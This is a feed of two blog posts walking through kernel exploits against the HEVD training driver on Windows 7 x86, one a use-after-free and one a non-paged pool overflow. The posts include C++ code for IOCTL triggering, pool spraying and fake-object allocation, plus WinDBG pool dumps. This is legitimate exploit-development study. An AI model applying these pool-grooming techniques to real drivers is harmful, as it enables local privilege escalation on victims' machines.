Normal view

There are new articles available, click to refresh the page.
Before yesterdayThe Human Machine Interface

HEVD Exploits – Windows 7 x86 Use-After-Free

By: h0mbre
23 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

UAF Setup

I’ve never exploited a use-after-free bug on any system before. I vaguely understood the concept before starting this excercise. We need what, in my noob opinion, seems like quite a lot of primitives in order to make this work. Obviously HEVD goes out of its way to be vulnerable in precisely the correct way for us to get an exploit working which is perfect for me since I have no experience with this bug class and we’re just here to learn. I feel like although we have to utilize multiple functions via IOCTL, this is actually a more simple exploit to pull off than the pool overflow that we just did.

Also, I wanted to do this on 64 bit; however, most of the strategies I saw outlined required that we use NtQuerySystemInformation, which as far as I know requires your process to be elevated to an extent so I wanted to avoid that. On 64 bit, the pool header structure size changes from 0x8 bytes to 0x10 bytes which makes exploitation more cumbersome; however, there are some good walkthroughs out there about how to accomplish this. For now, let’s stick to x86.

What do we need in order to exploit a use-after-free bug? Well, it seems like after doing this excercise we need to be able to do the following:

  • allocate an object in the non-paged pool,
  • a mechansim that creates a reference to the object as a global variable, ie if our object is allocated at 0xFFFFFFFF, there is some variable out there in the program that is storing that address for later use,
  • the ability to free the memory and not have the previously established reference NULLed out, ie when the chunk is freed the program author doesn’t specify that the reference=NULL,
  • the ability to create “fake” objects that have the same size and controllable contents in the non-paged pool,
  • the ability to spray the non-paged pool and create perfectly sized holes so that our UAF and fake objects can be fitted in our created holes,
  • finally, the ability to use the no-longer valid reference to our freed chunk.

Allocating the UAF Object in the Pool

Let’s take a look at the UAF object allocation routine in the driver in IDA.

It may not be immediately clear what’s going on without stepping through the routine in the debugger but we actually have very little control over what is taking place here. I’ve created a small skeleton exploit code and set a breakpoint towards the start of the routine. Here is our code at the moment:

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);
}


int main() {

    HANDLE hFile = grab_handle();

    create_UAF_object(hFile);

    return 0;
}

You can see from the IDA screenshot that after the call to ExAllocatePoolWithTag, eax is placed in esi, this is about where I’ve placed the breakpoint, we can then take the value in esi which should be a pointer to our allocation, and go see what the allocation will look like after the subsequent memset operation completes. We can see some static values as well, such as waht appears to be the size of the allocation (0x58), which we know from our last post is actually undersold by 0x8 since we have to account also for the pool header, so our real allocation size in the pool is 0x60 bytes.

So we hit our breakpoint after ExAllocatePoolWithTag and then I just stepped through until the memset completed.

Right after the memset completed, we look up our object in the pool and see that it’s mostly been filled with A characters except for the first DWORD value has been left NULL. After stepping through the next two instructions:

We can see that the DWORD value has been filled and also that a null terminator has been added to the last byte of our allocation. This DWORD is the UaFObjectCallback which is a function pointer for a callback which gets used during a separate routine.

And lastly in the screenshot we can see that move esi, which is the location of our allocation, into the global variable g_UseAfterFreeObject. This is important because this is what makes this code vulnerable as this same variable will not be nulled out when the object is freed.

Freeing the UAF Object

Now, lets try interacting with the driver routine which allows us to free our object.

Not a whole lot here, we can see though that there is no effort made to NULL the global variable g_UserAfterFreeObject. You can see that even after we run the routine, the vairable still holds the value of our freed allocation address:

Allocating a Fake Object

Now let’s see how much freedom we have to allocate arbitrary objects in the non-paged pool. Looking at the function, it uses the same APIs we’re familiar with, does a probe for read to make sure the buffer is in user land (I think?), and then builds our chunk to our specifications.

I just sent a buffer of size 0x58 with all A characters for testing. It even appends a null-terminator to the end like the real UAF object allocator, but we control the contents of this one. This is good since we’ll have full control over the pointer value at prepended to the chunk that serves as the call back function pointer.

Executing UAF Object Callback

This is where the “use” portion of “Use-After-Free” comes in. There is a driver routine that allows us to take the address which holds the callback function pointer of the UAF object and then call the function there. We can see this in IDA.

We can see that as long as the value at [eax], which holds the address of our UAF object (or what used to be our UAF object before we freed it) is not NULL, we’ll go ahead and call the function pointer stored at that location (the callback function). Right now, if we called this, what would happen? Let’s see!

Looking up the memory address of what was our freed chunk we see that it is NOT NULL. We would actually call something, but the address that would be called is 0x852c22f0. Looking at that address, we see that there is just arbitrary code there.

This is not what we want. We want this to be predictable just like our last exploit. We want the freed address of our UAF object to be filled with our fake object, so when the function pointer at that address is called, it will be a pointer we control, our shellcode. To do this, our plan of attack is very similar to our last post. Please go through that exploit first!

Spraying the Non-Paged Pool

First thing is first, we need an object that fits our needs. Last post we used Event Objects, but this time around, since we need 0x60 sized chunks, we’ll be using IoCompletionReserve objects which we can allocate with NtAllocateReserveObject (thanks blogpost authors).

We’ll do the same thing we did last time but spray some more. In my testing I found that I had to spray more to get the chunks sequential like we want:

  • defragment the pool with 10,000 objects
  • aim for some sequential/contiguous blocks of objects with another spray of 30,000 objects.

Next, we’ll want to poke holes in the contiguous block portion, remember? We’ll be collecting handles to these objects in vectors so that we can later free the ones we need to create the holes. The holes are already the perfect size, so we’ll just free every other contiguous block handle so that way, every hole that is created in our contiguous block will be surrounded on both sides by our objects. Let’s update our exploit code and test out the spray. Huge thanks to @tekwizz123 once again for showing in his exploit how to get NtAllocateReserveObject into the program, would’ve taken me a long time to trouble shoot those compilation errors without his help. Our spray test code:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME             "\\\\.\\HackSysExtremeVulnerableDriver"
#define ALLOCATE_UAF_IOCTL      0x222013
#define FREE_UAF_IOCTL          0x22201B
#define FAKE_OBJECT_IOCTL       0x22201F
#define USE_UAF_IOCTL           0x222017

vector<HANDLE> defrag_handles;
vector<HANDLE> sequential_handles;

typedef struct _LSA_UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    UNICODE_STRING* ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES;

#define POBJECT_ATTRIBUTES OBJECT_ATTRIBUTES*

typedef NTSTATUS(WINAPI* _NtAllocateReserveObject)(
    OUT PHANDLE hObject,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    IN DWORD ObjectType);

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void create_UAF_object(HANDLE hFile) {

    cout << "[>] Creating UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        ALLOCATE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object allocated.\n";
}

void free_UAF_object(HANDLE hFile) {

    cout << "[>] Freeing UAF object...\n";
    BYTE input_buffer[] = "\x00";

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FREE_UAF_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not free UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] UAF object freed.\n";
}

void allocate_fake_object(HANDLE hFile) {

    cout << "[>] Creating fake UAF object...\n";
    BYTE input_buffer[0x58] = { 0 };

    memset((void*)input_buffer, '\x41', 0x58);

    DWORD bytes_ret = 0x0;

    int result = DeviceIoControl(hFile,
        FAKE_OBJECT_IOCTL,
        input_buffer,
        sizeof(input_buffer),
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] Could not create fake UAF object\n";
        cout << "[!] Last error: " << dec << GetLastError() << "\n";
        exit(1);
    }
    cout << "[>] Fake UAF object created.\n";
}

void spray() {

    // thanks Tekwizz as usual
    _NtAllocateReserveObject NtAllocateReserveObject = 
        (_NtAllocateReserveObject)GetProcAddress(GetModuleHandleA("ntdll.dll"),
            "NtAllocateReserveObject");

    if (!NtAllocateReserveObject) {

        cout << "[!] Failed to get the address of NtAllocateReserve.\n";
        cout << "[!] Last error " << GetLastError() << "\n";
        exit(1);
    }

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        defrag_handles.push_back(hObject);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 30000; i++) {

        HANDLE hObject = 0x0;

        PHANDLE result = (PHANDLE)NtAllocateReserveObject((PHANDLE)&hObject,
            NULL,
            1); // specifies the correct object

        if (result != 0) {
            cout << "[!] Error allocating IoCo Object during defragmentation\n";
            exit(1);
        }
        sequential_handles.push_back(hObject);
    }

    cout << "[>] Sequential spray complete.\n";

    cout << "[>] Poking 0x60 byte-sized holes in our sequential allocation...\n";
    for (int i = 0; i < sequential_handles.size(); i++) {
        if (i % 2 == 0) {
            BOOL freed = CloseHandle(sequential_handles[i]);
        }
    }
    cout << "[>] Holes poked lol.\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29997] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29998] << "\n";
    cout << "[>] Some handles: " << hex << sequential_handles[29999] << "\n";

    Sleep(1000);
    DebugBreak();
}

int main() {

    HANDLE hFile = grab_handle();

    //create_UAF_object(hFile);

    //free_UAF_object(hFile);

    //allocate_fake_object(hFile);

    spray();

    return 0;
}

We can see after running this and looking at one of the handles we dumped to the terminal (thanks FuzzySec!), we were able to get our pool looking the way we want. 0x60 byte chunks free surrounded by our IoCo objects.

kd> !handle 0x2724c

PROCESS 86974250  SessionId: 1  Cid: 1238    Peb: 7ffdf000  ParentCid: 1554
    DirBase: bf5d4fc0  ObjectTable: abb08b80  HandleCount: 25007.
    Image: HEVDUAF.exe

Handle table at 89f1f000 with 25007 entries in use

2724c: Object: 8543b6d0  GrantedAccess: 000f0003 Entry: 88415498
Object: 8543b6d0  Type: (84ff1a88) IoCompletionReserve
    ObjectHeader: 8543b6b8 (new version)
        HandleCount: 1  PointerCount: 1


kd> !pool 8543b6d0 
Pool page 8543b6d0 region is Nonpaged pool
 8543b000 size:   60 previous size:    0  (Allocated)  IoCo (Protected)
 8543b060 size:   38 previous size:   60  (Free)       `.C.
 8543b098 size:   20 previous size:   38  (Allocated)  ReTa
 8543b0b8 size:   28 previous size:   20  (Allocated)  FSro
 8543b0e0 size:  500 previous size:   28  (Free)       Io  
 8543b5e0 size:   60 previous size:  500  (Allocated)  IoCo (Protected)
 8543b640 size:   60 previous size:   60  (Free)       IoCo
*8543b6a0 size:   60 previous size:   60  (Allocated) *IoCo (Protected)
		Owning component : Unknown (update pooltag.txt)
 8543b700 size:   60 previous size:   60  (Free)       IoCo
 8543b760 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b7c0 size:   60 previous size:   60  (Free)       IoCo
 8543b820 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b880 size:   60 previous size:   60  (Free)       IoCo
 8543b8e0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543b940 size:   60 previous size:   60  (Free)       IoCo
 8543b9a0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543ba00 size:   60 previous size:   60  (Free)       IoCo
 8543ba60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bac0 size:   60 previous size:   60  (Free)       IoCo
 8543bb20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bb80 size:   60 previous size:   60  (Free)       IoCo
 8543bbe0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bc40 size:   60 previous size:   60  (Free)       IoCo
 8543bca0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bd00 size:   60 previous size:   60  (Free)       IoCo
 8543bd60 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bdc0 size:   60 previous size:   60  (Free)       IoCo
 8543be20 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543be80 size:   60 previous size:   60  (Free)       IoCo
 8543bee0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)
 8543bf40 size:   60 previous size:   60  (Free)       IoCo
 8543bfa0 size:   60 previous size:   60  (Allocated)  IoCo (Protected)

Executing Plan

Now that we’ve confirmed our heap spray works, the next step is to implement our game-plan. We want to:

  • spray the heap to get it like so ^^,
  • allocate our UAF object,
  • free our UAF object,
  • create our fake objects with malicious callback function pointers,
  • activate the callback function.

All we really need to do now is allocate the shellcode, get a pointer to it, and place that pointer into our input buffer when we create our fake objects and spray those into the holes we poked so around 15,000 of them.

When we run our final code, we get our system shell!

Complete exploit code.

Conclusion

That was a pretty exaggerated exploit scenario I would guess, but it was perfect for me since I had never done a UAF exploit before. Next we’ll be doing the stack overflow again but this time on Windows 10 where we’ll have to bypass SMEP. Until next time.

Once again, big thanks to all the content producers out there for getting me through these exploits.

HEVD Exploits – Windows 7 x86 Non-Paged Pool Overflow

By: h0mbre
22 April 2020 at 04:00

Introduction

Continuing on with my goal to develop exploits for the Hacksys Extreme Vulnerable Driver. I will be using HEVD 2.0. There are a ton of good blog posts out there walking through various HEVD exploits. I recommend you read them all! I referenced them heavily as I tried to complete these exploits. Almost nothing I do or say in this blog will be new or my own thoughts/ideas/techniques. There were instances where I diverged from any strategies I saw employed in the blogposts out of necessity or me trying to do my own thing to learn more.

This series will be light on tangential information such as:

  • how drivers work, the different types, communication between userland, the kernel, and drivers, etc
  • how to install HEVD,
  • how to set up a lab environment
  • shellcode analysis

The reason for this is simple, the other blog posts do a much better job detailing this information than I could ever hope to. It feels silly writing this blog series in the first place knowing that there are far superior posts out there; I will not make it even more silly by shoddily explaining these things at a high-level in poorer fashion than those aforementioned posts. Those authors have way more experience than I do and far superior knowledge, I will let them do the explaining. :)

This post/series will instead focus on my experience trying to craft the actual exploits.

Thanks

This exploit required a lot of insight into the non-paged pool internals of Windows 7. These walkthroughs/blogs were extremely well written and made everything very logical and clear. I really appreciate the authors’ help! Again, I’m just recreating other people’s exploits in this series trying to learn, not inventing new ways to exploit pool overflows for 32 bit Windows 7. The exploit also required allocating the NULL page, which isn’t possible on x64 so this will be a 32 bit exploit only.

Reversing Relevant Function

The bug for this driver routine is really similar to some of the stack based buffer overflow vulnerabilities we’ve already done like the stack overflow and the integer overflow. We get a user buffer and send it to the routine which will allocate a kernel buffer and copy our user buffer into the kernel buffer. The only difference here is the type of memory used. Instead of the stack, this memory is allocated in the non-paged pool which are pool chunks that are guaranteed to be in physical memory (RAM) at all times and cannot be paged out. This stands in contrast to paged pool which is allowed to be “paged out” when there is no more RAM capacity to a secondary storage medium.

The APIs that are relevant here in this routine are ExAllocatePoolWithTag and ExFreePoolWithTag. This API prototype looks like this:

PVOID ExAllocatePoolWithTag(
  __drv_strictTypeMatch(__drv_typeExpr)POOL_TYPE PoolType,
  SIZE_T                                         NumberOfBytes,
  ULONG                                          Tag
);

In our routine all of these parameters are hardcoded for us. PoolType is set to NonPagedPool, NumberOfBytes is set to 0x1F8, and Tag is set to 0x6B636148 (‘Hack’). This by itself is fine and there is no vulnerability obviously; however, the driver routine uses memcpy to transfer data from the user buffer to this newly allocated non-paged pool kernel buffer and uses the size of the user buffer as the size argument. (This precisely the bug in the Jungo driver that @steventseeley discovered via fuzzing.) If the size of our user buffer is larger than the kernel buffer, we will overwrite some data in the adjacent non-paged pool. Here is a screenshot of the function in IDA Free 7.0.

Nothing too complicated reversing wise, we can even see that right after our pool buffer is allocated, it is de-allocated with ExFreePoolWithTag.

If we call the function with the following skeleton code, we will see in WinDBG that everything works as normal and we can start trying to understand how the pool chunks are structured.

#include <iostream>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F


HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void send_payload(HANDLE hFile) {

    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    send_payload(hFile);

    return 0;
}

I set a breakpoint at offset 0x4D64 with this command in WinDBG: bp !HEVD+4D64 which is right after the memcpy operation and we see that our pool buffer has been filled with our \x42 characters. At this point a pointer to the allocated kernel buffer is still in eax so we can go to that location with the !pool command which will start at the beginning of that page of memory and display certain aspects of the memory allocated there.

kd> !pool 85246430
Pool page 85246430 region is Nonpaged pool
 85246000 size:   c8 previous size:    0  (Allocated)  Ntfx
 852460c8 size:   10 previous size:   c8  (Free)       .PZH
 852460d8 size:   20 previous size:   10  (Allocated)  ReTa
 852460f8 size:   20 previous size:   20  (Allocated)  ReTa
 85246118 size:   48 previous size:   20  (Allocated)  Vad 
 85246160 size:   68 previous size:   48  (Allocated)  NpFn Process: 8507a030
 852461c8 size:   20 previous size:   68  (Allocated)  ReTa
 852461e8 size:   20 previous size:   20  (Allocated)  ReTa
 85246208 size:  168 previous size:   20  (Free)       CcSc
 85246370 size:   b8 previous size:  168  (Allocated)  NbtD
*85246428 size:  200 previous size:   b8  (Allocated) *Hack
		Owning component : Unknown (update pooltag.txt)
 85246628 size:   20 previous size:  200  (Allocated)  ReTa
 85246648 size:   68 previous size:   20  (Allocated)  FMsl
 852466b0 size:   c8 previous size:   68  (Allocated)  Ntfx
 85246778 size:  180 previous size:   c8  (Free)       EtwG
 852468f8 size:   98 previous size:  180  (Allocated)  MmCa
 85246990 size:    8 previous size:   98  (Free)       Nb29
 85246998 size:   48 previous size:    8  (Allocated)  Vad 
 852469e0 size:  1b8 previous size:   48  (Allocated)  LSbf
 85246b98 size:   b8 previous size:  1b8  (Allocated)  File (Protected)
 85246c50 size:   60 previous size:   b8  (Free)       Clfs
 85246cb0 size:  1b0 previous size:   60  (Allocated)  NSIk
 85246e60 size:   20 previous size:  1b0  (Allocated)  ReTa
 85246e80 size:   b8 previous size:   20  (Allocated)  File (Protected)
 85246f38 size:   c8 previous size:   b8  (Allocated)  Ntfx

We that even though our pointer in eax to our kernel buffer was 0x85246430, the allocation actually begins at 0x85246428 which is 0x8 before. This is because there is a 4 byte ULONG value and our pool tag placed before our actually buffer begins. Using some of the commands from the aforementioned blogposts goes a long way in WinDBG to being able to clearly think about these data structures.

kd> dt nt!_POOL_HEADER 85246428
   +0x000 PreviousSize     : 0y000010111 (0x17)
   +0x000 PoolIndex        : 0y0000000 (0)
   +0x002 BlockSize        : 0y001000000 (0x40)
   +0x002 PoolType         : 0y0000010 (0x2)
   +0x000 Ulong1           : 0x4400017
   +0x004 PoolTag          : 0x6b636148
   +0x004 AllocatorBackTraceIndex : 0x6148
   +0x006 PoolTagHash      : 0x6b63

This shows us the makeup of the pool header. We can see it spans 8 total bytes which we knew. The numbers that begin 0y are binary. But, you can see that PreviousSize, PoolIndex, BlockSize, and PoolType all get their values smushed together and form this Ulong1 member which begins at offset 0x000. Then, from that offset, we get our pool tag. So that’s all 8 bytes accounted for. We can use the memory pane to scroll to the bottom of our buffer and spy on the next memory chunk’s header as well.

We can see that the header values for the next chunk are: 40 00 04 04 52 65 54 61.

The only other thing to pay attention to, was that the !pool command told us our chunk was 0x200 bytes long which makes sense when you add the size of the header 0x8 to our allocated buffer size of 0x1F8.

Generic Attack Strategy

Before we proceed, we have to understand how we’re going to utilize this ability, via our oversized user buffer, to arbitrarily overwrite data in the adjacent pool allocation as an attack vector. What we have right now is the ability to overwrite pool memory. In order for this to be worth while for us, we have to find a way to get the pool into a state where what we’re overwriting is predictable. If what we’re overwriting is unpredictable, we can never form a reliable exploit. If we damage some of the fields here and aren’t surgical in our overwrites, we’ll easily get a BSOD.

Generically, in its organic state, the non-paged pool is fragmented, meaning there are holes in it from chunks being freed arbitrarily by other processes on the system. What we want to do is cover these holes by spraying a ton of objects into the non-paged pool so that the pool allocation mechanism places our chunks into those available slots. Once this is complete, we’ll want to spray even more objects so that by far, the most common objects in the pool are the ones we have just sprayed.

By way of analogy, if you had a bag of a chess set’s pieces, you would have low odds of pulling a King from the bag; however, if you then added 15,000 Kings to the bag, your chances are much better!

So we have two goals outlined so far:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory.

What we’ll do next, is take our pretty pool allocations that form a large solid block, and poke holes in it the size of our kernel buffer we can allocate with the driver routine. Our kernel buffer is 0x200 bytes remember. This way, when our kernel buffer is allocated in the pool, the allocator will place it in the newly freed 0x200 byte hole we have just created. Now what we have, is our alloaction completely surrounded by the objects we had sprayed. This is perfect because now when our buffer overwrites data in the adjacent pool allocation, we’ll know exactly what we’re overwriting because it will be a chunk that we allocated ourselves, not an arbitrary system process.

We will use this ability to overwrite data to predictably overwrite a piece of data in one of our allocated objects that will, once the allocation is freed, end up to the kernel executing a function pointer which we will have filled with shellcode. So now our generic gameplan is:

  • spray the pool with objects until its organically existing holes are patched with our objects,
  • spray the pool again to increase the sheer number of objects we’ve allocated so that they’ll be sequential in non-paged pool memory,
  • poke some nice 0x200 byte-sized holes in the allocations,
  • use our driver routine to fit our kernel buffer in one of these new holes,
  • have that allocation predictably overwrite information in the adjacent allocation that leads to kernel execution of our shellcode when the corrupted allocation is freed.

Next, we’ll get to know the object we’ll be using to spray the pool.

Event Objects

The blogpost authors inform us that Event Objects are perfect for this job for a few reasons, but one of the main reasons is that it is 0x40 bytes in size. A quick Python interpreter check shows us that we can neatly free 8 Event Objects and have our 0x200 byte sized holes we wanted.

>>> 0x200 % 0x40
0
>>> 0x200 / 0x40
8.0

We don’t care much about the content of these events, so every parameter will be basically NULL when we use the CreateEvent API:

HANDLE CreateEventA(
  LPSECURITY_ATTRIBUTES lpEventAttributes,
  BOOL                  bManualReset,
  BOOL                  bInitialState,
  LPCSTR                lpName
);

What’s most important for us now, is finding out what we need to overwrite in this object to get code execution when the corrupted Event Object is freed. We’ll go ahead and spray a similar amount of objects that FuzzySec and r0otki7 did,

  • 10,000 to fill the holes in the fragmented pool
  • 5,000 to create a nice long contiguous block of Event Objects

Our code now looks like this:

#include <iostream>
#include <vector>
#include <Windows.h>

using namespace std;

#define DEVICE_NAME         "\\\\.\\HackSysExtremeVulnerableDriver"
#define IOCTL               0x22200F

vector<HANDLE> defragment_handles;
vector<HANDLE> sequential_handles;

HANDLE grab_handle() {

    HANDLE hFile = CreateFileA(DEVICE_NAME,
        FILE_READ_ACCESS | FILE_WRITE_ACCESS,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        cout << "[!] No handle to HackSysExtremeVulnerableDriver\n";
        exit(1);
    }

    cout << "[>] Grabbed handle to HackSysExtremeVulnerableDriver: " << hex
        << hFile << "\n";

    return hFile;
}

void spray_pool() {

    cout << "[>] Spraying pool to defragment...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during defragmentation\n";
            exit(1);
        }

        defragment_handles.push_back(result);
    }
    cout << "[>] Defragmentation spray complete.\n";
    cout << "[>] Spraying sequential allocations...\n";
    for (int i = 0; i < 10000; i++) {

        HANDLE result = CreateEvent(NULL,
            0,
            0,
            L"");

        if (!result) {
            cout << "[!] Error allocating Event Object during sequential.\n";
            exit(1);
        }

        sequential_handles.push_back(result);
    }
    
    cout << "[>] Sequential spray complete.\n";
}

void send_payload(HANDLE hFile) {
    
    ULONG payload_len = 0x1F8;

    LPVOID input_buff = VirtualAlloc(NULL,
        payload_len + 0x1,
        MEM_RESERVE | MEM_COMMIT,
        PAGE_EXECUTE_READWRITE);

    memset(input_buff, '\x42', payload_len);

    cout << "[>] Sending buffer size of: " << dec << payload_len << "\n";

    DWORD bytes_ret = 0;

    int result = DeviceIoControl(hFile,
        IOCTL,
        input_buff,
        payload_len,
        NULL,
        0,
        &bytes_ret,
        NULL);

    if (!result) {

        cout << "[!] DeviceIoControl failed!\n";

    }
}

int main() {

    HANDLE hFile = grab_handle();

    spray_pool();

    send_payload(hFile);

    return 0;
}

Take note that we’re storing the handles to each Event Object in a vector so that we can access those later.

Let’s spray our objects and then allocate our kernel buffer and see what the page looks like that our kernel buffer ends up being allocated on. We still have the same breakpoint from before, right after the memcpy operation. At this point the kernel buffer pointer is still in eax don’t forget, so I just want to subtract 0x1000 from it because thats a small page size and then advance by just plugging that right in to the !pool command we get the whole page’s allocation information:

kd> !pool 8628b008-0x1000
Pool page 8628a008 region is Nonpaged pool
*8628a000 size:   40 previous size:    0  (Allocated) *Even (Protected)
		Pooltag Even : Event objects
 8628a040 size:   80 previous size:   40  (Free)       b.2.
 8628a0c0 size:   40 previous size:   80  (Allocated)  Even (Protected)
 8628a100 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a140 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a180 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a1c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a200 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a240 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a280 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a2c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a300 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a340 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a380 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a3c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a400 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a440 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a480 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a4c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a500 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a540 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a580 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a5c0 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a600 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a640 size:   40 previous size:   40  (Allocated)  Even (Protected)
 8628a680 size:   40 previous size:   40  (Allocated)  Even (Protected)
